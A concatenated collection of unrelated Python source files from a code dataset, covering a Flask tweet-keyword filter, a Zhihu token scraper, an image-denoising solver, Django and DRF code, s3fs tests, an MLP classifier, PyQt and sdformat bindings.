all_lines)\r\n\r\n\r\n # if they search the string 'politics', then it will filter the text to find donald trump's offensive shit\r\n if search == \"politics\":\r\n regex = \"'text': '([^']*( hispanics | Republican | Democrat | Hillary | Trump | Bernie | wall | immigration | alien | gun | Muslim | terrorist )[^']*)'\"\r\n\r\n dataCrop = findall(regex, all_lines)\r\n\r\n # if they search the string 'coding', then it will filter the text to find things to do with coding\r\n if search == \"coding\":\r\n regex = \"'text': '([^']*( code | coding | Python | Java | tech | programming | robotic | hack| software | API | JavaScript )[^']*)'\"\r\n\r\n dataCrop = findall(regex, all_lines)\r\n\r\n # if they search the string 'employment', then it will filter the text to find things to do with the workplace\r\n if search == \"employment\":\r\n regex = \"'text': '([^']*( job | boss | worker | work | internship )[^']*)'\"\r\n\r\n dataCrop = findall(regex, all_lines)\r\n\r\n ### if they search the string 'school', then it will filter the text to find things to do with college\r\n ##if search == \"employment\":\r\n ##regex = \"'text': '([^']*( job | boss | worker | work | internship )[^']*)'\"\r\n\r\n ##dataCrop = findall(regex, all_lines)\r\n #dataCrop = findall(\"Bernie\", all_lines)\r\n print(\"datacrop\")\r\n #print(dataCrop)\r\n\r\n\r\n #tweets = dataCrop\r\n listlength = len(dataCrop)\r\n\r\n\r\n for x in dataCrop:\r\n print(x)\r\n\r\n if dataCrop == []:\r\n dataCrop = [(\"This filter returned no flagged tweets from this user.\", \"\")]\r\n\r\n words = \"(\"\r\n data = str(dataCrop)\r\n count = 
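The per-filter if blocks above differ only in their keyword alternation; a data-driven sketch that builds the same regex shape from a table (keyword sets abbreviated, helper names hypothetical):

    from re import findall

    FILTERS = {
        'alcohol': ['shots', 'party', 'beer'],
        'school': ['school', 'AP', 'honors', 'class'],
    }

    def flagged_tweets(filter_name, raw_text):
        # Same pattern shape the record builds by hand for each filter.
        words = '|'.join(' %s ' % w for w in FILTERS[filter_name])
        pattern = "'text': '([^']*(%s)[^']*)'" % words
        return [m[0] for m in findall(pattern, raw_text)]

    sample = "{'text': 'lets party tonight'}"
    assert flagged_tweets('alcohol', sample) == ['lets party tonight']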
data.count(words)\r\n return render_template(\"filters.html\", tweets=dataCrop, filter=filter, count=count, handle=handle)\r\n\r\n\r\n #return render_template(handle + \" has been flagged \" + str(count) + \" time(s) for \" + filter)\r\n\r\n#this regex will match any combination of letters and numbers between 4 and 6 characters, followed by a - and a slug,\r\n#a text string the first part will get the identifier \"uid\", while the slug is going to be called slug\r\n#both parameters are passed to the view, that will print both values to prove they are correct\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()","sub_path":"twitcherFinal/twitcher_files.py","file_name":"twitcher_files.py","file_ext":"py","file_size_in_byte":6621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"79528140","text":"# -*- coding:utf-8 -*-\nimport requests\nimport re\n\nagent = 'Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'\nheaders = {\n 'User-Agent': agent\n}\nsession = requests.session()\nindex_url = 'https://www.zhihu.com'\n# 获取登录时需要用到的_xsrf\nindex_page = session.get(index_url, headers=headers)\nhtml = index_page.text\npattern = r'name=\"_xsrf\" value=\"(.*?)\"'\n# 这里的_xsrf 返回的是一个list\n_xsrf = re.findall(pattern, html)\nprint (_xsrf[0])\n# 得到_xsrf","sub_path":"untitled/zhihuSessionTEst.py","file_name":"zhihuSessionTEst.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"104320883","text":"import numpy as np \nimport skimage\nimport gradModule\nimport cv2\nimport acceleratedPrimalDual\n# that's a warper for the method skimage.restoration.denoise_tv_chambolle , that resolve the problem :\n# argmin int_{u} |nabla u | + 1/(2*theta)*(u-v), with v an image of fiwed size\n# tha main purpose of this code is code of the library\n\nclass ROFSolver(object):\n\t\"\"\"algorithm that resolves: argmin int_{u} |nabla u | + 1/(2*theta)*(u-v) \"\"\"\n\tdef __init__(self, v,theta,uInit=None):\n\t\tself.v = v\n\t\tself.theta = theta\n\t\tself.uInit = uInit.copy()\n\t\tself.compute()\n\tdef compute(self):\n\t\tlbda = 1.0/(self.theta)\n\t\t# self.u = skimage.restoration.denoise_tv_chambolle(self.v,weight= weight,eps=10**(-30),n_iter_max=5000)\n\t\tself.primalDualAlgo = acceleratedPrimalDual.PrimalDualAccelerated(self.v,lbda,self.uInit)\n\t\tself.u = self.primalDualAlgo.uc\n\tdef computeCost(self,u):\n\t\treturn self.primalDualAlgo.computeCostPrimal(u)\n\n\tdef computeCostForSolution(self):\n\t\treturn self.primalDualAlgo.computeCostPrimalCurrent()\n\t\t\n\n\nclass testROFFromScipy(object):\n\t\"\"\"docstring for testROFFromScipy\"\"\"\n\tdef __init__(self,v,theta,uInit):\n\t\tself.GradModule = gradModule.GradModule()\n\t\tself.v = v\n\t\tself.theta = theta\n\t\tself.uInit = uInit\n\tdef applyAlgotihm(self):\n\t\tself.rofSolver = ROFSolver(self.v,self.theta,self.uInit)\n\t\tself.uOptimal = self.rofSolver.u \n\t\tself.minCost = self.computeCost(self.uOptimal)\n\n\tdef computeCost(self,u):\n\t\treturn self.rofSolver.computeCost(u)\n\tdef testUnitary(self,u):\n\t\tcost = self.computeCost(u)\n\t\ttmp = (cost,self.minCost,cost>=self.minCost)\n\t\tprint(tmp)\n\t\treturn tmp\n\n\tdef testmultiple(self,err=10**(-14),nbTest=10000):\n\t\tfor i in range(nbTest):\n\t\t\tu =self.uOptimal + (np.random.rand(*self.uOptimal.shape)-0.5)*err\n\t\t\ttmp = self.testUnitary(u)\n\t\t\tif(tmp[2]==False):\n\t\t\t\tbreak;\n\n\nif __name__ == '__main__':\n\t# v = 
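The zhihu snippet above scrapes _xsrf with a regex over raw HTML; the equivalent lookup with BeautifulSoup is less brittle (bs4 assumed available; the inline HTML stands in for the real page):

    from bs4 import BeautifulSoup

    html = '<input type="hidden" name="_xsrf" value="abc123"/>'
    soup = BeautifulSoup(html, 'html.parser')

    assert soup.find('input', attrs={'name': '_xsrf'})['value'] == 'abc123'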
cv2.imread(\"./2009_09_08_drive_0010/I1_000000.png\")[...,0].astype(\"float32\")/255\n\t# uInit = np.zeros(v.shape)\n\tv = np.load(\"v.npy\")\n\tuInit = np.load(\"uInit.npy\")\n\ttheta = np.load(\"theta.npy\")\n\talgo = testROFFromScipy(v,theta,uInit)\n\talgo.applyAlgotihm()\n\talgo.uOptimal = algo.uInit\n\talgo.minCost = algo.computeCost(algo.uOptimal)\n\talgo.testmultiple()","sub_path":"rofSolver/rofSolver.py","file_name":"rofSolver.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"11279576","text":"from rest_framework import serializers\r\nfrom .models import Account, Transaction\r\nfrom .fields import CurrencyField\r\n\r\n\r\nclass AccountSerializer(serializers.ModelSerializer):\r\n balance = serializers.DecimalField(125, 2, read_only=True, label=\"Balance\")\r\n class Meta:\r\n model = Account\r\n fields = (\r\n 'id',\r\n 'name',\r\n 'balance',\r\n )\r\n read_only_fields = (\r\n 'balance',\r\n )\r\n\r\n\r\n\r\nclass TransactionSerializer(serializers.ModelSerializer):\r\n debit_account = AccountSerializer()\r\n credit_account = AccountSerializer()\r\n name = serializers.CharField(source=\"description\", read_only=True, label=\"Name\")\r\n class Meta:\r\n model = Transaction\r\n fields = (\r\n 'id',\r\n 'name',\r\n 'date',\r\n 'debit_account',\r\n 'credit_account',\r\n 'description',\r\n 'amount',\r\n )\r\n hidden_fields = (\r\n 'name'\r\n )\r\n read_only_fields = (\r\n 'name',\r\n )\r\n","sub_path":"serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"236788149","text":"from flask import Flask, session\napp = Flask(__name__)\n# Add these extra two lines\napp.secret_key = 's3cr3t'\napp.config['SESSION_TYPE'] = 'filesystem'\n\n@app.route('/')\ndef count(x):\n # See if we already instantiated the list\n s = session.get('sum', None)\n if not s:\n # If it's not there, add our first item.\n session['sum'] = x\n else:\n # If it's there, add the current number\n session['sum']+=x\n # Display current count\n return str(session['sum'])\n\n\n@app.route('/')\ndef home():\n return 'Open this page and go to /5 or some other number'\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","sub_path":".ipynb_checkpoints/sessions-checkpoint.py","file_name":"sessions-checkpoint.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"356009191","text":"import json\nimport os\n\n\ndef readMainConfig():\n\tpath = os.path.join(os.getcwd(), \"config.json\")\n\twith open(path, 'r') as f:\n\t\tdata = f.read()\n\treturn json.loads(data)\n\n\ndef getNodeConfig():\n\tpath = os.path.join(os.getcwd(), \"hostConfig.json\")\n\twith open(path, 'r') as f:\n\t\tdata = f.read()\n\treturn json.loads(data)\n\ndef getKeys():\n\tpath = os.path.join(os.getcwd(), \"fixtures\", \"prKeys.json\")\n\twith open(path, 'r') as f:\n\t\tdata = f.read()\n\treturn json.loads(data)\n\ndef readFixtures(type):\n\tpath = \"\"\n\tif type == \"contracts\":\n\t\tpath = os.path.join(os.getcwd(), \"fixtures\", \"contracts.json\")\n\tif type == \"pages\":\n\t\tpath = os.path.join(os.getcwd(), \"fixtures\", \"pages.json\")\n\twith open(path, 'r', encoding='UTF-8') as f:\n\t\tdata = f.read()\n\treturn 
json.loads(data)\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"317668102","text":"# -*- coding: utf-8 -*-\nimport pytest\nfrom distributed.s3fs import S3FileSystem\nfrom distributed.s3 import seek_delimiter\nfrom distributed.utils_test import slow\nfrom distributed.utils import ignoring\n\nfrom botocore.exceptions import NoCredentialsError\n\n# These get mirrored on s3://distributed-test/\ntest_bucket_name = 'distributed-test'\nfiles = {'test/accounts.1.json': (b'{\"amount\": 100, \"name\": \"Alice\"}\\n'\n b'{\"amount\": 200, \"name\": \"Bob\"}\\n'\n b'{\"amount\": 300, \"name\": \"Charlie\"}\\n'\n b'{\"amount\": 400, \"name\": \"Dennis\"}\\n'),\n 'test/accounts.2.json': (b'{\"amount\": 500, \"name\": \"Alice\"}\\n'\n b'{\"amount\": 600, \"name\": \"Bob\"}\\n'\n b'{\"amount\": 700, \"name\": \"Charlie\"}\\n'\n b'{\"amount\": 800, \"name\": \"Dennis\"}\\n')}\n\ncsv_files = {'2014-01-01.csv': (b'name,amount,id\\n'\n b'Alice,100,1\\n'\n b'Bob,200,2\\n'\n b'Charlie,300,3\\n'),\n '2014-01-02.csv': (b'name,amount,id\\n'),\n '2014-01-03.csv': (b'name,amount,id\\n'\n b'Dennis,400,4\\n'\n b'Edith,500,5\\n'\n b'Frank,600,6\\n')}\n\n@pytest.yield_fixture\ndef s3():\n # could do with a bucket with write privileges.\n yield S3FileSystem(anon=True)\n\n\ndef test_non_anonymous_access():\n with ignoring(NoCredentialsError):\n fs = S3FileSystem(anon=False)\n fs.ls('distributed-test')\n\n\ndef test_s3_file_access(s3):\n fn = 'distributed-test/nested/file1'\n data = b'hello\\n'\n assert s3.cat(fn) == data\n assert s3.head(fn, 3) == data[:3]\n assert s3.tail(fn, 3) == data[-3:]\n assert s3.tail(fn, 10000) == data\n\n\ndef test_s3_file_info(s3):\n fn = 'distributed-test/nested/file1'\n data = b'hello\\n'\n assert fn in s3.walk('distributed-test')\n assert s3.exists(fn)\n assert not s3.exists(fn+'another')\n assert s3.info(fn)['Size'] == len(data)\n with pytest.raises((OSError, IOError)):\n s3.info(fn+'another')\n\n\ndef test_du(s3):\n d = s3.du(test_bucket_name, deep=True)\n assert all(isinstance(v, int) and v >= 0 for v in d.values())\n assert 'distributed-test/nested/file1' in d\n\n assert s3.du(test_bucket_name + '/test/', total=True) ==\\\n sum(map(len, files.values()))\n\n\ndef test_s3_ls(s3):\n fn = 'distributed-test/nested/file1'\n assert fn not in s3.ls('distributed-test/')\n assert fn in s3.ls('distributed-test/nested/')\n assert fn in s3.ls('distributed-test/nested')\n assert s3.ls('s3://distributed-test/nested/') == s3.ls('distributed-test/nested')\n\n\ndef test_s3_ls_detail(s3):\n L = s3.ls('distributed-test/nested', detail=True)\n assert all(isinstance(item, dict) for item in L)\n\n\ndef test_s3_glob(s3):\n fn = 'distributed-test/nested/file1'\n assert fn not in s3.glob('distributed-test/')\n assert fn not in s3.glob('distributed-test/*')\n assert fn in s3.glob('distributed-test/nested')\n assert fn in s3.glob('distributed-test/nested/*')\n assert fn in s3.glob('distributed-test/nested/file*')\n assert fn in s3.glob('distributed-test/*/*')\n\n\ndef test_get_list_of_summary_objects(s3):\n L = s3.ls(test_bucket_name + '/test')\n\n assert len(L) == 2\n assert [l.lstrip(test_bucket_name).lstrip('/') for l in sorted(L)] == sorted(list(files))\n\n L2 = s3.ls('s3://' + test_bucket_name + '/test')\n\n assert L == L2\n\n\ndef test_read_keys_from_bucket(s3):\n for k, data in files.items():\n file_contents = s3.cat('/'.join([test_bucket_name, k]))\n assert 
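The readers above repeat one open/read/parse shape; a generic sketch that covers all of them (read_json is a hypothetical name):

    import json
    import os

    def read_json(*parts):
        # Join path parts under the working directory and parse the file.
        path = os.path.join(os.getcwd(), *parts)
        with open(path, 'r', encoding='UTF-8') as f:
            return json.load(f)

    # e.g. read_json('config.json') or read_json('fixtures', 'prKeys.json')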
file_contents == data\n\n assert (s3.cat('/'.join([test_bucket_name, k])) ==\n s3.cat('s3://' + '/'.join([test_bucket_name, k])))\n\n\n@slow\ndef test_seek_delimiter(s3):\n fn = 'test/accounts.1.json'\n data = files[fn]\n with s3.open('/'.join([test_bucket_name, fn])) as f:\n seek_delimiter(f, b'}', 0)\n assert f.tell() == 0\n f.seek(1)\n seek_delimiter(f, b'}', 5)\n assert f.tell() == data.index(b'}') + 1\n seek_delimiter(f, b'\\n', 5)\n assert f.tell() == data.index(b'\\n') + 1\n f.seek(1, 1)\n ind = data.index(b'\\n') + data[data.index(b'\\n')+1:].index(b'\\n') + 1\n seek_delimiter(f, b'\\n', 5)\n assert f.tell() == ind + 1\n\n\ndef test_read_s3_block(s3):\n import io\n data = files['test/accounts.1.json']\n lines = io.BytesIO(data).readlines()\n path = 'distributed-test/test/accounts.1.json'\n assert s3.read_block(path, 1, 35, b'\\n') == lines[1]\n assert s3.read_block(path, 0, 30, b'\\n') == lines[0]\n assert s3.read_block(path, 0, 35, b'\\n') == lines[0] + lines[1]\n assert s3.read_block(path, 0, 5000, b'\\n') == data\n assert len(s3.read_block(path, 0, 5)) == 5\n assert len(s3.read_block(path, 4, 5000)) == len(data) - 4\n assert s3.read_block(path, 5000, 5010) == b''\n\n assert s3.read_block(path, 5, None) == s3.read_block(path, 5, 1000)\n","sub_path":"distributed/tests/test_s3fs.py","file_name":"test_s3fs.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"47410394","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.datasets import make_classification\nfrom sklearn.model_selection import train_test_split\n\n\nclass NN_Classifier():\n\ttrained = False\n\n\tdef __init__(self):\n\t\tself.mlp_predictor = MLPClassifier()\n\n\tdef train(self, X_train, y_train):\n\t\tself.scaler = StandardScaler()\n\t\tself.scaler.fit(X_train)\n\t\tX_train = self.scaler.transform(X_train)\n\t\tself.mlp_predictor.fit(X_train, y_train)\n\t\tself.trained = True\n\t\t# return train accuracy\n\t\treturn self.mlp_predictor.score(X_train, y_train)\n\n\tdef predict(self, X_test):\n\t\tassert self.trained, \"You should call train first.\"\n\t\tX_test = self.scaler.transform(X_test)\n\t\treturn self.mlp_predictor.predict(X_test)\n\n\tdef plot(self, X_train, y_train, X_test, y_test):\n\t\talphas = np.logspace(-6, 3, 10)\n\t\taccuracy = []\n\n\t\tfor i in alphas:\n\t\t\tclassifier = MLPClassifier(alpha=i, max_iter=300)\n\t\t\tscaler = StandardScaler()\n\t\t\tscaler.fit(X_train)\n\t\t\tX_train = scaler.transform(X_train)\n\t\t\tclassifier.fit(X_train, y_train)\n\t\t\tX_test = scaler.transform(X_test)\n\t\t\taccuracy.append(classifier.score(X_test, y_test))\n\n\t\tplt.plot(np.log10(alphas), accuracy)\n\t\tplt.xlabel(\"alpha in log10\")\n\t\tplt.ylabel(\"accuracy\")\n\t\tplt.title(\"regularization comparison in neural_network\")\n\t\tplt.savefig(\"neural_network_analysis.png\")\n\t\tplt.show()\n\n\n","sub_path":"nureral_network.py","file_name":"nureral_network.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"537655755","text":"import sys\nimport os\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\n\n\nfolder_path = os.path.dirname(os.path.abspath(__file__))\n\nform_class = uic.loadUiType(os.path.join(folder_path,\"lineEdit.ui\"))[0]\n\n# Declare the class used to display the window\nclass WindowClass(QMainWindow, 
form_class) :\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n\n self.pb_2.clicked.connect(self.btn_2_clicked)\n self.pb_1.clicked.connect(self.btn_1_clicked)\n\n self.lineE_1.textChanged.connect(self.line_E_textChanged)\n self.lineE_1.returnPressed.connect(self.lineE_1_returnPressed)\n\n # self.g_pb_1.clicked.connect(self.g_pb_1_clicked)\n # self.g_pb_2.clicked.connect(self.g_pb_2_clicked)\n # self.g_pb_3.clicked.connect(self.g_pb_3_clicked)\n # self.g_pb_4.clicked.connect(self.g_pb_4_clicked)\n\n\n def btn_1_clicked(self):\n self.lineE_1.setText(\"change Text\")\n\n def btn_2_clicked(self):\n self.lb_1.setText(\"change text\")\n\n def line_E_textChanged(self):\n self.lb_1.setText(self.lineE_1.text())\n\n def lineE_1_returnPressed(self):\n print(self.lineE_1.text())\n\n\n # def g_pb_1_clicked(self):\n # print(self.textB_1.toPlainText())\n\n # def g_pb_2_clicked(self):\n # self.textB_1.setPlainText(\"1st line\")\n\n # def g_pb_3_clicked(self):\n # self.textB_1.append(\"2nd Line\")\n\n # def g_pb_4_clicked(self):\n # self.textB_1.clear()\n \n\n \n\n\n\n\n\n\n \n\n\nif __name__ == \"__main__\" :\n app = QApplication(sys.argv) \n myWindow = WindowClass() \n myWindow.show()\n app.exec_()","sub_path":"py_designer_tutorial/4_line_Edit.py","file_name":"4_line_Edit.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"617531922","text":"from dataclasses import dataclass, field\nfrom typing import List, Optional\nfrom .model import Model\n\n__NAMESPACE__ = \"sdformat/v1.4/state.xsd\"\n\n\n@dataclass\nclass State:\n \"\"\"\n Parameters\n ----------\n sim_time: Simulation time stamp of the state [seconds nanoseconds]\n wall_time: Wall time stamp of the state [seconds nanoseconds]\n real_time: Real time stamp of the state [seconds nanoseconds]\n insertions: A list of new model names\n deletions: A list of deleted model names\n model: Model state\n world_name: Name of the world this state applies to\n \"\"\"\n\n class Meta:\n name = \"state\"\n\n sim_time: str = field(\n default=\"0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"white_space\": \"collapse\",\n \"pattern\": r\"\\d+ \\d+\",\n },\n )\n wall_time: str = field(\n default=\"0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"white_space\": \"collapse\",\n \"pattern\": r\"\\d+ \\d+\",\n },\n )\n real_time: str = field(\n default=\"0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"white_space\": \"collapse\",\n \"pattern\": r\"\\d+ \\d+\",\n },\n )\n insertions: Optional[\"State.Insertions\"] = field(\n default=None,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n },\n )\n deletions: Optional[\"State.Deletions\"] = field(\n default=None,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n },\n )\n model: List[\"State.Model\"] = field(\n default_factory=list,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n },\n )\n world_name: Optional[str] = field(\n default=None,\n metadata={\n \"type\": \"Attribute\",\n \"required\": True,\n },\n )\n\n @dataclass\n class Insertions:\n \"\"\"\n A list of new model names.\n\n Parameters\n ----------\n model: The model element defines a complete robot or any other\n physical object.\n \"\"\"\n\n model: List[Model] = field(\n default_factory=list,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n },\n )\n\n @dataclass\n 
class Deletions:\n \"\"\"\n A list of deleted model names.\n\n Parameters\n ----------\n name: The name of a deleted model\n \"\"\"\n\n name: List[str] = field(\n default_factory=list,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"min_occurs\": 1,\n },\n )\n\n @dataclass\n class Model:\n \"\"\"\n Model state.\n\n Parameters\n ----------\n pose: Pose of the model\n joint: Joint angle\n link: Link state\n name: Name of the model\n \"\"\"\n\n pose: str = field(\n default=\"0 0 0 0 0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"pattern\": r\"(\\s*(-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+)\\s+){5}((-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+))\\s*\",\n },\n )\n joint: List[\"State.Model.Joint\"] = field(\n default_factory=list,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n },\n )\n link: List[\"State.Model.Link\"] = field(\n default_factory=list,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n },\n )\n name: Optional[str] = field(\n default=None,\n metadata={\n \"type\": \"Attribute\",\n \"required\": True,\n },\n )\n\n @dataclass\n class Joint:\n \"\"\"\n Joint angle.\n\n Parameters\n ----------\n angle: Angle of an axis\n name: Name of the joint\n \"\"\"\n\n angle: List[\"State.Model.Joint.Angle\"] = field(\n default_factory=list,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"min_occurs\": 1,\n },\n )\n name: Optional[str] = field(\n default=None,\n metadata={\n \"type\": \"Attribute\",\n \"required\": True,\n },\n )\n\n @dataclass\n class Angle:\n \"\"\"\n Parameters\n ----------\n value:\n axis: Index of the axis.\n \"\"\"\n\n value: Optional[float] = field(\n default=None,\n metadata={\n \"required\": True,\n },\n )\n axis: Optional[int] = field(\n default=None,\n metadata={\n \"type\": \"Attribute\",\n \"required\": True,\n },\n )\n\n @dataclass\n class Link:\n \"\"\"\n Link state.\n\n Parameters\n ----------\n pose: Pose of the link relative to the model\n velocity: Velocity of the link\n acceleration: Acceleration of the link\n wrench: Force applied to the link\n collision: Collision state\n name: Name of the link\n \"\"\"\n\n pose: str = field(\n default=\"0 0 0 0 0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"pattern\": r\"(\\s*(-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+)\\s+){5}((-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+))\\s*\",\n },\n )\n velocity: str = field(\n default=\"0 0 0 0 0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"pattern\": r\"(\\s*(-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+)\\s+){5}((-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+))\\s*\",\n },\n )\n acceleration: str = field(\n default=\"0 0 0 0 0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"pattern\": r\"(\\s*(-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+)\\s+){5}((-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+))\\s*\",\n },\n )\n wrench: str = field(\n default=\"0 0 0 0 0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"pattern\": r\"(\\s*(-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+)\\s+){5}((-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+))\\s*\",\n },\n )\n collision: List[\"State.Model.Link.Collision\"] = field(\n default_factory=list,\n metadata={\n \"type\": 
\"Element\",\n \"namespace\": \"\",\n },\n )\n name: Optional[str] = field(\n default=None,\n metadata={\n \"type\": \"Attribute\",\n \"required\": True,\n },\n )\n\n @dataclass\n class Collision:\n \"\"\"\n Collision state.\n\n Parameters\n ----------\n pose: Pose of the link relative to the model\n name: Name of the collision\n \"\"\"\n\n pose: str = field(\n default=\"0 0 0 0 0 0\",\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"\",\n \"required\": True,\n \"pattern\": r\"(\\s*(-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+)\\s+){5}((-|\\+)?(\\d+(\\.\\d*)?|\\.\\d+|\\d+\\.\\d+[eE][-\\+]?[0-9]+))\\s*\",\n },\n )\n name: Optional[str] = field(\n default=None,\n metadata={\n \"type\": \"Attribute\",\n \"required\": True,\n },\n )\n","sub_path":"skbot/ignition/sdformat/bindings/v14/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":8814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"119854747","text":"#!/usr/bin/env python2\n\nfrom __future__ import print_function\n\nimport os\nimport random\nimport sys\n\nMAX_LEN = 9\nALPHABET='0123456789abcdefghijklmnopqrstuvwxyz'\nLEN_ALPHA=len(ALPHABET)\n\nurandom = random.SystemRandom()\nrnum = urandom.randint(0, LEN_ALPHA**MAX_LEN-1)\n\ndef base62(a):\n\tbaseit = (\n\t\tlambda a=a, b=LEN_ALPHA: (not a) and '0' or\n\t\tbaseit(a-a%b, b*LEN_ALPHA) + ALPHABET[a%b%(LEN_ALPHA-1) or -1*bool(a%b)]\n\t)\n\treturn baseit()\n\n#http://stackoverflow.com/a/36875787\n\nresult = base62(rnum).lstrip('0').zfill(MAX_LEN)\n\nif len(sys.argv) == 2:\n\tprint(result, end='')\nelse:\n\tprint(result)\n","sub_path":"asciidoc/bin/story-id.py","file_name":"story-id.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"173297305","text":"import datetime\n\nfrom django import forms\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom records.models import Record\nfrom tagging.models import Tag\nfrom tinymce.widgets import TinyMCE\nfrom groups.forms import GroupAssociationRequestRelatedForm\nfrom groups.models import Group\n\nfrom models import Action, UserActionProgress, GroupActionProgress\n\nclass BaseActionForm(forms.Form):\n def __init__(self, user, action, *args, **kwargs):\n super(BaseActionForm, self).__init__(*args, **kwargs)\n self.user = user\n self.action = action\n\nclass ActionCommitForm(BaseActionForm):\n date_committed = forms.DateField(\n label=_(\"Commit date\"),\n widget=forms.DateInput(format=\"%Y-%m-%d\", \n attrs={\"class\": \"date_commit_field\"}))\n\n def __init__(self, *args, **kwargs):\n super(ActionCommitForm, self).__init__(*args, **kwargs)\n if not self.user or self.user.is_anonymous() or not self.action:\n self.fields[\"date_committed\"].initial = (datetime.date.today() + \n datetime.timedelta(days=1))\n return\n try:\n uap = UserActionProgress.objects.get(user=self.user, action=self.action)\n except UserActionProgress.DoesNotExist:\n uap = None\n if uap and uap.date_committed:\n self.fields[\"date_committed\"].initial = uap.date_committed\n else:\n self.fields[\"date_committed\"].initial = (datetime.date.today() + \n datetime.timedelta(days=1))\n\n def save(self):\n return self.action.commit_for_user(\n self.user, self.cleaned_data[\"date_committed\"])\n\nclass GroupActionCommitForm(BaseActionForm):\n date_committed = forms.DateField(\n label=_(\"Commit date\"),\n widget=forms.DateInput(format=\"%Y-%m-%d\", \n attrs={\"class\": 
\"date_commit_field\"}))\n group = forms.CharField(widget=forms.HiddenInput, required=True)\n\n def __init__(self, *args, **kwargs):\n group = kwargs.pop(\"group\", None)\n self.mark_completed = kwargs.pop(\"mark_completed\", False)\n self.mark_cancelled = kwargs.pop(\"mark_cancelled\", False)\n self.mark_undone = kwargs.pop(\"mark_undone\", False)\n\n super(GroupActionCommitForm, self).__init__(*args, **kwargs)\n\n if not group:\n group = self.data.get(\"group\")\n if group:\n group = Group.objects.get(slug=group)\n\n self.group_obj = group\n self.fields[\"group\"].initial = group.slug if group else ''\n if (not self.user or self.user.is_anonymous() \n or not self.action\n or not self.group_obj):\n self.fields[\"date_committed\"].initial = (datetime.date.today() + \n datetime.timedelta(days=1))\n return\n try:\n gap = GroupActionProgress.objects.get(group=self.group_obj, action=self.action)\n except GroupActionProgress.DoesNotExist:\n gap = None\n if gap and gap.date_committed:\n self.fields[\"date_committed\"].initial = gap.date_committed\n else:\n self.fields[\"date_committed\"].initial = (datetime.date.today() + \n datetime.timedelta(days=1))\n if self.mark_completed or self.mark_cancelled or self.mark_undone:\n self.fields[\"date_committed\"].required = 